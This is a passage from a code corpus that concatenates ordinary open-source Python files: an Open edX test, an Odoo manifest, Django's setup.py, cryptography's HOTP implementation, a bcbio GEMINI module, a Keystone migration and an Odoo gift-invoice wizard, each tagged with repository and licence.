"end": NEXT_MONTH,
"advertised_start": "Very Soon!", # Not parse-able advertised_start
"pre_requisite_courses": [], # No pre-requisites
"static_asset_path": "my/relative/path", # Relative asset path
"certificates_show_before_end": False,
},
{
"display_name": "", # Empty display name
"start": LAST_MONTH, # Course already ended
"end": LAST_WEEK,
"advertised_start": None, # No advertised start
"pre_requisite_courses": [], # No pre-requisites
"static_asset_path": "", # Empty asset path
"certificates_show_before_end": False,
},
{
# # Don't set display name
"start": DEFAULT_START_DATE, # Default start and end dates
"end": None,
"advertised_start": None, # No advertised start
"pre_requisite_courses": [], # No pre-requisites
"static_asset_path": None, # No asset path
"certificates_show_before_end": False,
}
],
[ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split]
))
@ddt.unpack
def test_course_overview_behavior(self, course_kwargs, modulestore_type):
"""
Tests if CourseOverviews and CourseDescriptors behave the same
by comparing pairs of them given a variety of scenarios.
Arguments:
course_kwargs (dict): kwargs to be passed to course constructor.
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
# Note: We specify a value for 'run' here because, for some reason,
# .create raises an InvalidKeyError if we don't (even though my
# other test functions don't specify a run but work fine).
course = CourseFactory.create(default_store=modulestore_type, run="TestRun", **course_kwargs)
self.check_course_overview_against_course(course)
@ddt.data(ModuleStoreEnum.Type.mongo, ModuleStoreEnum.Type.split)
def test_course_overview_cache_invalidation(self, modulestore_type):
"""
Tests that when a course is published or deleted, the corresponding
course_overview is removed from the cache.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
with self.store.default_store(modulestore_type):
# Create a course where mobile_available is True.
course = CourseFactory.create(mobile_available=True, default_store=modulestore_type)
course_overview_1 = CourseOverview.get_from_id(course.id)
self.assertTrue(course_overview_1.mobile_available)
# Set mobile_available to False and update the course.
# This fires a course_published signal, which should be caught in signals.py, which should in turn
# delete the corresponding CourseOverview from the cache.
course.mobile_available = False
with self.store.branch_setting(ModuleStoreEnum.Branch.draft_preferred):
self.store.update_item(course, ModuleStoreEnum.UserID.test)
# Make sure that when we load the CourseOverview again, mobile_available is updated.
course_overview_2 = CourseOverview.get_from_id(course.id)
self.assertFalse(course_overview_2.mobile_available)
# Verify that when the course is deleted, the corresponding CourseOverview is deleted as well.
with self.assertRaises(CourseOverview.DoesNotExist):
self.store.delete_course(course.id, ModuleStoreEnum.UserID.test)
CourseOverview.get_from_id(course.id)
@ddt.data((ModuleStoreEnum.Type.mongo, 1, 1), (ModuleStoreEnum.Type.split, 3, 4))
@ddt.unpack
def test_course_overview_caching(self, modulestore_type, min_mongo_calls, max_mongo_calls):
"""
Tests that CourseOverview structures are actually getting cached.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
min_mongo_calls (int): minimum number of MongoDB queries we expect
to be made.
max_mongo_calls (int): maximum number of MongoDB queries we expect
to be made.
"""
course = CourseFactory.create(default_store=modulestore_type)
# The first time we load a CourseOverview, it will be a cache miss, so
# we expect the modulestore to be queried.
with check_mongo_calls_range(max_finds=max_mongo_calls, min_finds=min_mongo_calls):
_course_overview_1 = CourseOverview.get_from_id(course.id)
# The second time we load a CourseOverview, it will be a cache hit, so
# we expect no modulestore queries to be made.
with check_mongo_calls(0):
_course_overview_2 = CourseOverview.get_from_id(course.id)
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_get_non_existent_course(self, modulestore_type):
"""
Tests that requesting a non-existent course from get_from_id raises
CourseOverview.DoesNotExist.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
store = modulestore()._get_modulestore_by_type(modulestore_type) # pylint: disable=protected-access
with self.assertRaises(CourseOverview.DoesNotExist):
CourseOverview.get_from_id(store.make_course_key('Non', 'Existent', 'Course'))
@ddt.data(ModuleStoreEnum.Type.split, ModuleStoreEnum.Type.mongo)
def test_get_errored_course(self, modulestore_type):
"""
Test that getting an ErrorDescriptor back from the module store causes
get_from_id to raise an IOError.
Arguments:
modulestore_type (ModuleStoreEnum.Type): type of store to create the
course in.
"""
course = CourseFactory.create(default_store=modulestore_type)
mock_get_course = mock.Mock(return_value=ErrorDescriptor)
with mock.patch('xmodule.modulestore.mixed.MixedModuleStore.get_course', mock_get_course):
# This mock makes it so when the module store tries to load course data,
# an exception is thrown, which causes get_course to return an ErrorDescriptor,
# which causes get_from_id to raise an IOError.
with self.assertRaises(IOError):
CourseOverview.get_from_id(course.id)
def test_malformed_grading_policy(self):
"""
Test that CourseOverview handles courses with a malformed grading policy
such that course._grading_policy['GRADE_CUTOFFS'] = {} by defaulting
.lowest_passing_grade to None.
Created in response to https://openedx.atlassian.net/browse/TNL-2806.
"""
course = CourseFactory.create()
course._grading_policy['GRADE_CUTOFFS'] = {} # pylint: disable=protected-access
with self.assertRaises(ValueError):
__ = course.lowest_passing_grade
course_overview = CourseOverview._create_from_course(course) # pylint: disable=protected-access
self.assertEqual(course_overview.lowest_passing_grade, None)
| agpl-3.0 |
rschnapka/odoo | addons/base_action_rule/__openerp__.py | 57 | 1998 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Automated Action Rules',
'version': '1.0',
'category': 'Sales Management',
'description': """
This module allows implementing action rules for any object.
============================================================
Use automated actions to automatically trigger actions for various screens.
**Example:** A lead created by a specific user may be automatically set to a specific
sales team, or an opportunity which still has status pending after 14 days might
trigger an automatic reminder email.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base', 'mail'],
'data': [
'base_action_rule_view.xml',
'security/ir.model.access.csv',
'base_action_rule_data.xml'
],
'demo': [],
'installable': True,
'auto_install': False,
'images': ['images/base_action_rule1.jpeg','images/base_action_rule2.jpeg','images/base_action_rule3.jpeg'],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
benjaminrigaud/django | setup.py | 41 | 3302 | import os
import sys
from setuptools import setup, find_packages
from distutils.sysconfig import get_python_lib
# Warn if we are installing over top of an existing installation. This can
# cause issues where files that were deleted from a more recent Django are
# still present in site-packages. See #18115.
overlay_warning = False
if "install" in sys.argv:
lib_paths = [get_python_lib()]
if lib_paths[0].startswith("/usr/lib/"):
# We have to try also with an explicit prefix of /usr/local in order to
# catch Debian's custom user site-packages directory.
lib_paths.append(get_python_lib(prefix="/usr/local"))
for lib_path in lib_paths:
existing_path = os.path.abspath(os.path.join(lib_path, "django"))
if os.path.exists(existing_path):
# We note the need for the warning here, but present it after the
# command is run, so it's more likely to be seen.
overlay_warning = True
break
EXCLUDE_FROM_PACKAGES = ['django.conf.project_template',
'django.conf.app_template',
'django.bin']
# Dynamically calculate the version based on django.VERSION.
version = __import__('django').get_version()
setup(
name='Django',
version=version,
url='http://www.djangoproject.com/',
author='Django Software Foundation',
author_email='foundation@djangoproject.com',
description=('A high-level Python Web framework that encourages '
'rapid development and clean, pragmatic design.'),
license='BSD',
packages=find_packages(exclude=EXCLUDE_FROM_PACKAGES),
include_package_data=True,
scripts=['django/bin/django-admin.py'],
entry_points={'console_scripts': [
'django-admin = django.core.management:execute_from_command_line',
]},
extras_require={
"bcrypt": ["bcrypt"],
},
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Internet :: WWW/HTTP :: WSGI',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Software Development :: Libraries :: Python Modules',
],
)
if overlay_warning:
sys.stderr.write("""
========
WARNING!
========
You have just installed Django over top of an existing
installation, without removing it first. Because of this,
your install may now include extraneous files from a
previous version that have since been removed from
Django. This is known to cause a variety of problems. You
should manually remove the
%(existing_path)s
directory and re-install Django.
""" % {"existing_path": existing_path})
| bsd-3-clause |
enriquesanchezb/practica_utad_2016 | venv/lib/python2.7/site-packages/py/_code/assertion.py | 218 | 3287 | import sys
import py
BuiltinAssertionError = py.builtin.builtins.AssertionError
_reprcompare = None # if set, will be called by assert reinterp for comparison ops
def _format_explanation(explanation):
"""This formats an explanation
Normally all embedded newlines are escaped, however there are
    three exceptions: \n{, \n} and \n~. The first two are intended
    to cover nested explanations, see function and attribute explanations
for examples (.visit_Call(), visit_Attribute()). The last one is
for when one explanation needs to span multiple lines, e.g. when
displaying diffs.
"""
raw_lines = (explanation or '').split('\n')
# escape newlines not followed by {, } and ~
lines = [raw_lines[0]]
for l in raw_lines[1:]:
if l.startswith('{') or l.startswith('}') or l.startswith('~'):
lines.append(l)
else:
lines[-1] += '\\n' + l
result = lines[:1]
stack = [0]
stackcnt = [0]
for line in lines[1:]:
if line.startswith('{'):
if stackcnt[-1]:
s = 'and '
else:
s = 'where '
stack.append(len(result))
stackcnt[-1] += 1
stackcnt.append(0)
result.append(' +' + ' '*(len(stack)-1) + s + line[1:])
elif line.startswith('}'):
assert line.startswith('}')
stack.pop()
stackcnt.pop()
result[stack[-1]] += line[1:]
else:
assert line.startswith('~')
result.append(' '*len(stack) + line[1:])
assert len(stack) == 1
return '\n'.join(result)
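# Illustrative sketch (not from the upstream py distribution): a tiny input for
# the escape scheme described in the docstring above. The explanation string is
# an example only.
def _format_explanation_example():
    two_level = 'assert a == b\n{a = 1\n}'
    # The embedded "\n{" opens a nested "where ..." clause and "\n}" closes it.
    return _format_explanation(two_level)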
class AssertionError(BuiltinAssertionError):
def __init__(self, *args):
BuiltinAssertionError.__init__(self, *args)
if args:
try:
self.msg = str(args[0])
except py.builtin._sysex:
raise
except:
                self.msg = "<[broken __repr__] %s at 0x%x>" %(
args[0].__class__, id(args[0]))
else:
f = py.code.Frame(sys._getframe(1))
try:
source = f.code.fullsource
if source is not None:
try:
source = source.getstatement(f.lineno, assertion=True)
except IndexError:
source = None
else:
source = str(source.deindent()).strip()
except py.error.ENOENT:
source = None
# this can also occur during reinterpretation, when the
# co_filename is set to "<run>".
if source:
self.msg = reinterpret(source, f, should_fail=True)
else:
self.msg = "<could not determine information>"
if not self.args:
self.args = (self.msg,)
if sys.version_info > (3, 0):
AssertionError.__module__ = "builtins"
reinterpret_old = "old reinterpretation not available for py3"
else:
from py._code._assertionold import interpret as reinterpret_old
if sys.version_info >= (2, 6) or (sys.platform.startswith("java")):
from py._code._assertionnew import interpret as reinterpret
else:
reinterpret = reinterpret_old
| apache-2.0 |
wangyou/XX-Net | code/default/python27/1.0/lib/linux/cryptography/hazmat/primitives/twofactor/hotp.py | 7 | 2206 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import struct
import six
from cryptography.exceptions import (
InvalidToken, UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.backends.interfaces import HMACBackend
from cryptography.hazmat.primitives import constant_time, hmac
from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512
class HOTP(object):
def __init__(self, key, length, algorithm, backend):
if not isinstance(backend, HMACBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HMACBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
if len(key) < 16:
raise ValueError("Key length has to be at least 128 bits.")
if not isinstance(length, six.integer_types):
raise TypeError("Length parameter must be an integer type.")
if length < 6 or length > 8:
raise ValueError("Length of HOTP has to be between 6 to 8.")
if not isinstance(algorithm, (SHA1, SHA256, SHA512)):
raise TypeError("Algorithm must be SHA1, SHA256 or SHA512.")
self._key = key
self._length = length
self._algorithm = algorithm
self._backend = backend
def generate(self, counter):
truncated_value = self._dynamic_truncate(counter)
hotp = truncated_value % (10 ** self._length)
return "{0:0{1}}".format(hotp, self._length).encode()
def verify(self, hotp, counter):
if not constant_time.bytes_eq(self.generate(counter), hotp):
raise InvalidToken("Supplied HOTP value does not match.")
def _dynamic_truncate(self, counter):
ctx = hmac.HMAC(self._key, self._algorithm, self._backend)
ctx.update(struct.pack(">Q", counter))
hmac_value = ctx.finalize()
offset = six.indexbytes(hmac_value, len(hmac_value) - 1) & 0b1111
p = hmac_value[offset:offset + 4]
return struct.unpack(">I", p)[0] & 0x7fffffff
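# Illustrative usage sketch (not part of the library): generating and verifying
# a counter-based one-time password with the class above. The key bytes are an
# example only.
def _hotp_usage_example():
    from cryptography.hazmat.backends import default_backend
    hotp = HOTP(b"0123456789abcdef-example-key", 6, SHA1(), default_backend())
    token = hotp.generate(0)
    hotp.verify(token, 0)  # raises InvalidToken if the values do not match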
| bsd-2-clause |
gifford-lab/bcbio-nextgen | bcbio/variation/population.py | 1 | 12759 | """Provide infrastructure to allow exploration of variations within populations.
Uses the gemini framework (https://github.com/arq5x/gemini) to build SQLite
database of variations for query and evaluation.
"""
import collections
import csv
from distutils.version import LooseVersion
import os
import subprocess
import toolz as tz
from bcbio import install, utils
from bcbio.distributed.transaction import file_transaction
from bcbio.pipeline import config_utils
from bcbio.pipeline import datadict as dd
from bcbio.provenance import do, programs
from bcbio.variation import multiallelic, vcfutils
def prep_gemini_db(fnames, call_info, samples, extras):
"""Prepare a gemini database from VCF inputs prepared with snpEff.
"""
data = samples[0]
out_dir = utils.safe_makedir(os.path.join(data["dirs"]["work"], "gemini"))
name, caller, is_batch = call_info
gemini_db = os.path.join(out_dir, "%s-%s.db" % (name, caller))
multisample_vcf = get_multisample_vcf(fnames, name, caller, data)
gemini_vcf = multiallelic.to_single(multisample_vcf, data)
use_gemini_quick = (do_db_build(samples) and
any(vcfutils.vcf_has_variants(f) for f in fnames))
if not utils.file_exists(gemini_db) and use_gemini_quick:
use_gemini = do_db_build(samples) and any(vcfutils.vcf_has_variants(f) for f in fnames)
if use_gemini:
ped_file = create_ped_file(samples + extras, gemini_vcf)
gemini_db = create_gemini_db(gemini_vcf, data, gemini_db, ped_file)
return [[(name, caller), {"db": gemini_db if utils.file_exists(gemini_db) else None,
"vcf": multisample_vcf if is_batch else None}]]
def create_gemini_db(gemini_vcf, data, gemini_db=None, ped_file=None):
if not gemini_db:
gemini_db = "%s.db" % utils.splitext_plus(gemini_vcf)[0]
if not utils.file_exists(gemini_db):
if not vcfutils.vcf_has_variants(gemini_vcf):
return None
with file_transaction(data, gemini_db) as tx_gemini_db:
gemini = config_utils.get_program("gemini", data["config"])
if "program_versions" in data["config"].get("resources", {}):
gemini_ver = programs.get_version("gemini", config=data["config"])
else:
gemini_ver = None
# Recent versions of gemini allow loading only passing variants
load_opts = ""
if not gemini_ver or LooseVersion(gemini_ver) > LooseVersion("0.6.2.1"):
load_opts += " --passonly"
# For small test files, skip gene table loading which takes a long time
if gemini_ver and LooseVersion(gemini_ver) > LooseVersion("0.6.4"):
if _is_small_vcf(gemini_vcf):
load_opts += " --skip-gene-tables"
if "/test_automated_output/" in gemini_vcf:
load_opts += " --test-mode"
# Skip CADD or gerp-bp if neither are loaded
if gemini_ver and LooseVersion(gemini_ver) >= LooseVersion("0.7.0"):
gemini_dir = install.get_gemini_dir(data)
for skip_cmd, check_file in [("--skip-cadd", "whole_genome_SNVs.tsv.compressed.gz")]:
if not os.path.exists(os.path.join(gemini_dir, check_file)):
load_opts += " %s" % skip_cmd
# skip gerp-bp which slows down loading
load_opts += " --skip-gerp-bp "
num_cores = data["config"]["algorithm"].get("num_cores", 1)
tmpdir = os.path.dirname(tx_gemini_db)
eanns = _get_effects_flag(data)
# Apply custom resource specifications, allowing use of alternative annotation_dir
resources = config_utils.get_resources("gemini", data["config"])
gemini_opts = " ".join([str(x) for x in resources["options"]]) if resources.get("options") else ""
cmd = ("{gemini} {gemini_opts} load {load_opts} -v {gemini_vcf} {eanns} --cores {num_cores} "
"--tempdir {tmpdir} {tx_gemini_db}")
cmd = cmd.format(**locals())
do.run(cmd, "Create gemini database for %s" % gemini_vcf, data)
if ped_file:
cmd = [gemini, "amend", "--sample", ped_file, tx_gemini_db]
do.run(cmd, "Add PED file to gemini database", data)
return gemini_db
def _get_effects_flag(data):
effects_config = tz.get_in(("config", "algorithm", "effects"), data, "snpeff")
if effects_config == "snpeff":
return "-t snpEff"
elif effects_config == "vep":
return "-t VEP"
else:
return ""
def get_affected_status(data):
"""Retrieve the affected/unaffected status of sample.
Uses unaffected (1), affected (2), unknown (0) coding from PED files:
http://pngu.mgh.harvard.edu/~purcell/plink/data.shtml#ped
"""
affected = set(["tumor", "affected"])
unaffected = set(["normal", "unaffected"])
phenotype = str(tz.get_in(["metadata", "phenotype"], data, "")).lower()
if phenotype in affected:
return 2
elif phenotype in unaffected:
return 1
else:
return 0
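# Illustrative sketch (not in the original bcbio source): the phenotype coding
# described in the docstring above, shown on hand-built metadata dicts.
def _affected_status_examples():
    assert get_affected_status({"metadata": {"phenotype": "Tumor"}}) == 2
    assert get_affected_status({"metadata": {"phenotype": "normal"}}) == 1
    assert get_affected_status({"metadata": {}}) == 0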
def create_ped_file(samples, base_vcf):
"""Create a GEMINI-compatible PED file, including gender, family and phenotype information.
Checks for a specified `ped` file in metadata, and will use sample information from this file
before reconstituting from metadata information.
"""
def _code_gender(data):
g = dd.get_gender(data)
if g and str(g).lower() in ["male", "m"]:
return 1
elif g and str(g).lower() in ["female", "f"]:
return 2
else:
return 0
out_file = "%s.ped" % utils.splitext_plus(base_vcf)[0]
sample_ped_lines = {}
header = ["#Family_ID", "Individual_ID", "Paternal_ID", "Maternal_ID", "Sex", "Phenotype", "Ethnicity"]
for md_ped in list(set([x for x in [tz.get_in(["metadata", "ped"], data)
for data in samples] if x is not None])):
with open(md_ped) as in_handle:
reader = csv.reader(in_handle, dialect="excel-tab")
for parts in reader:
if parts[0].startswith("#") and len(parts) > len(header):
header = header + parts[len(header):]
else:
sample_ped_lines[parts[1]] = parts
if not utils.file_exists(out_file):
with file_transaction(samples[0], out_file) as tx_out_file:
with open(tx_out_file, "w") as out_handle:
writer = csv.writer(out_handle, dialect="excel-tab")
writer.writerow(header)
batch = _find_shared_batch(samples)
for data in samples:
sname = dd.get_sample_name(data)
if sname in sample_ped_lines:
writer.writerow(sample_ped_lines[sname])
else:
writer.writerow([batch, sname, "-9", "-9",
_code_gender(data), get_affected_status(data), "-9"])
return out_file
def _find_shared_batch(samples):
for data in samples:
batch = tz.get_in(["metadata", "batch"], data, dd.get_sample_name(data))
if not isinstance(batch, (list, tuple)):
return batch
def _is_small_vcf(vcf_file):
"""Check for small VCFs which we want to analyze quicker.
"""
count = 0
small_thresh = 250
with utils.open_gzipsafe(vcf_file) as in_handle:
for line in in_handle:
if not line.startswith("#"):
count += 1
if count > small_thresh:
return False
return True
def get_multisample_vcf(fnames, name, caller, data):
"""Retrieve a multiple sample VCF file in a standard location.
Handles inputs with multiple repeated input files from batches.
"""
unique_fnames = []
for f in fnames:
if f not in unique_fnames:
unique_fnames.append(f)
out_dir = utils.safe_makedir(os.path.join(data["dirs"]["work"], "gemini"))
if len(unique_fnames) > 1:
gemini_vcf = os.path.join(out_dir, "%s-%s.vcf.gz" % (name, caller))
vrn_file_batch = None
for variant in data["variants"]:
if variant["variantcaller"] == caller and variant.get("vrn_file_batch"):
vrn_file_batch = variant["vrn_file_batch"]
if vrn_file_batch:
utils.symlink_plus(vrn_file_batch, gemini_vcf)
return gemini_vcf
else:
return vcfutils.merge_variant_files(unique_fnames, gemini_vcf, data["sam_ref"],
data["config"])
else:
gemini_vcf = os.path.join(out_dir, "%s-%s%s" % (name, caller, utils.splitext_plus(unique_fnames[0])[1]))
utils.symlink_plus(unique_fnames[0], gemini_vcf)
return gemini_vcf
def _has_gemini(data):
from bcbio import install
gemini_dir = install.get_gemini_dir(data)
return ((os.path.exists(gemini_dir) and len(os.listdir(gemini_dir)) > 0)
and os.path.exists(os.path.join(os.path.dirname(gemini_dir), "gemini-config.yaml")))
def do_db_build(samples, need_bam=True, gresources=None):
"""Confirm we should build a gemini database: need gemini + human samples + not in tool_skip.
"""
genomes = set()
for data in samples:
if not need_bam or data.get("align_bam"):
genomes.add(data["genome_build"])
if "gemini" in utils.get_in(data, ("config", "algorithm", "tools_off"), []):
return False
if len(genomes) == 1:
if not gresources:
gresources = samples[0]["genome_resources"]
return (tz.get_in(["aliases", "human"], gresources, False)
and _has_gemini(samples[0]))
else:
return False
def get_gemini_files(data):
"""Enumerate available gemini data files in a standard installation.
"""
try:
from gemini import annotations, config
except ImportError:
return {}
return {"base": config.read_gemini_config()["annotation_dir"],
"files": annotations.get_anno_files().values()}
def _group_by_batches(samples, check_fn):
"""Group data items into batches, providing details to retrieve results.
"""
batch_groups = collections.defaultdict(list)
singles = []
out_retrieve = []
extras = []
for data in [x[0] for x in samples]:
if check_fn(data):
batch = tz.get_in(["metadata", "batch"], data)
name = str(data["name"][-1])
if batch:
out_retrieve.append((str(batch), data))
else:
out_retrieve.append((name, data))
for vrn in data["variants"]:
if vrn.get("population", True):
if batch:
batch_groups[(str(batch), vrn["variantcaller"])].append((vrn["vrn_file"], data))
else:
singles.append((name, vrn["variantcaller"], data, vrn["vrn_file"]))
else:
extras.append(data)
return batch_groups, singles, out_retrieve, extras
def _has_variant_calls(data):
if data.get("align_bam"):
for vrn in data["variants"]:
if vrn.get("vrn_file") and vcfutils.vcf_has_variants(vrn["vrn_file"]):
return True
return False
def prep_db_parallel(samples, parallel_fn):
"""Prepares gemini databases in parallel, handling jointly called populations.
"""
batch_groups, singles, out_retrieve, extras = _group_by_batches(samples, _has_variant_calls)
to_process = []
has_batches = False
for (name, caller), info in batch_groups.iteritems():
fnames = [x[0] for x in info]
to_process.append([fnames, (str(name), caller, True), [x[1] for x in info], extras])
has_batches = True
for name, caller, data, fname in singles:
to_process.append([[fname], (str(name), caller, False), [data], extras])
if len(samples) > 0 and not do_db_build([x[0] for x in samples]) and not has_batches:
return samples
output = parallel_fn("prep_gemini_db", to_process)
out_fetch = {}
for batch_id, out_file in output:
out_fetch[tuple(batch_id)] = out_file
out = []
for batch_name, data in out_retrieve:
out_variants = []
for vrn in data["variants"]:
use_population = vrn.pop("population", True)
if use_population:
vrn["population"] = out_fetch[(batch_name, vrn["variantcaller"])]
out_variants.append(vrn)
data["variants"] = out_variants
out.append([data])
for x in extras:
out.append([x])
return out
| mit |
117111302/PyGithub | github/InputGitAuthor.py | 25 | 2443 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
class InputGitAuthor(object):
"""
"""
def __init__(self, name, email, date):
"""
:param name: string
:param email: string
:param date: string
"""
assert isinstance(name, (str, unicode)), name
assert isinstance(email, (str, unicode)), email
assert isinstance(date, (str, unicode)), date # @todo Datetime?
self.__name = name
self.__email = email
self.__date = date
@property
def _identity(self):
return {
"name": self.__name,
"email": self.__email,
"date": self.__date,
}
| gpl-3.0 |
cernops/keystone | keystone/common/sql/migrate_repo/versions/104_drop_user_name_domainid_constraint.py | 4 | 2856 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import migrate
import sqlalchemy as sql
_USER_TABLE_NAME = 'user'
_USER_NAME_COLUMN_NAME = 'name'
_USER_DOMAINID_COLUMN_NAME = 'domain_id'
_USER_PASSWORD_COLUMN_NAME = 'password'
def upgrade(migrate_engine):
meta = sql.MetaData()
meta.bind = migrate_engine
user_table = sql.Table(_USER_TABLE_NAME, meta, autoload=True)
    # NOTE(gnuoy): the user name / `domain_id` unique constraint is not
    # guaranteed to have a fixed name, such as `ixu_user_name_domain_id`, so
    # we need to search for the correct constraint that only affects
    # user_table.c.domain_id and drop that constraint. (Fix based on
    # morganfainberg's fix in 088_domain_specific_roles.py)
#
# This is an idempotent change that reflects the fix to migration
# 91 if the user name & domain_id unique constraint was not named
# consistently and someone manually fixed the migrations / db
# without dropping the old constraint.
# This is a copy of migration 97 to catch any/all deployments that
# are close to master. migration 97 will be backported to
# stable/mitaka.
to_drop = None
if migrate_engine.name == 'mysql':
for index in user_table.indexes:
if (index.unique and len(index.columns) == 2 and
_USER_DOMAINID_COLUMN_NAME in index.columns and
_USER_NAME_COLUMN_NAME in index.columns):
to_drop = index
break
else:
for index in user_table.constraints:
if (len(index.columns) == 2 and
_USER_DOMAINID_COLUMN_NAME in index.columns and
_USER_NAME_COLUMN_NAME in index.columns):
to_drop = index
break
# remove domain_id and name unique constraint
if to_drop is not None:
migrate.UniqueConstraint(user_table.c.domain_id,
user_table.c.name,
name=to_drop.name).drop()
# If migration 91 was aborted due to Bug #1572341 then columns may not
# have been dropped.
if _USER_DOMAINID_COLUMN_NAME in user_table.c:
user_table.c.domain_id.drop()
if _USER_NAME_COLUMN_NAME in user_table.c:
user_table.c.name.drop()
if _USER_PASSWORD_COLUMN_NAME in user_table.c:
user_table.c.password.drop()
| apache-2.0 |
ksophocleous/grpc | src/python/grpcio_test/grpc_test/framework/common/__init__.py | 1496 | 1530 | # Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| bsd-3-clause |
CompassionCH/compassion-modules | sponsorship_compassion/wizards/generate_gift_wizard.py | 3 | 6826 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <ecino@compassion.ch>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import api, fields, models, _
from odoo.tools import config
from dateutil.relativedelta import relativedelta
from ..models.product import GIFT_REF
import logging
logger = logging.getLogger(__name__)
test_mode = config.get('test_enable')
class GenerateGiftWizard(models.TransientModel):
""" This wizard generates a Gift Invoice for a given contract. """
_name = 'generate.gift.wizard'
amount = fields.Float("Gift Amount", required=True)
product_id = fields.Many2one(
'product.product', "Gift Type", required=True)
invoice_date = fields.Date(default=fields.Date.today())
description = fields.Char("Additional comments", size=200)
force = fields.Boolean(
'Force creation', help="Creates the gift even if one was already "
"made the same year.")
@api.multi
def generate_invoice(self):
# Read data in english
self.ensure_one()
if not self.description:
self.description = self.product_id.display_name
invoice_ids = list()
gen_states = self.env['recurring.contract.group']._get_gen_states()
# Ids of contracts are stored in context
for contract in self.env['recurring.contract'].browse(
self.env.context.get('active_ids', list())).filtered(
lambda c: 'S' in c.type and c.state in gen_states
):
if self.product_id.default_code == GIFT_REF[0]:
# Birthday Gift
if not contract.child_id.birthdate:
logger.error(
'The birthdate of the child is missing!')
continue
# This is set in the view in order to let the user
# choose the invoice date. Otherwise (called from code)
# the invoice date will be computed based on the
# birthday of the child.
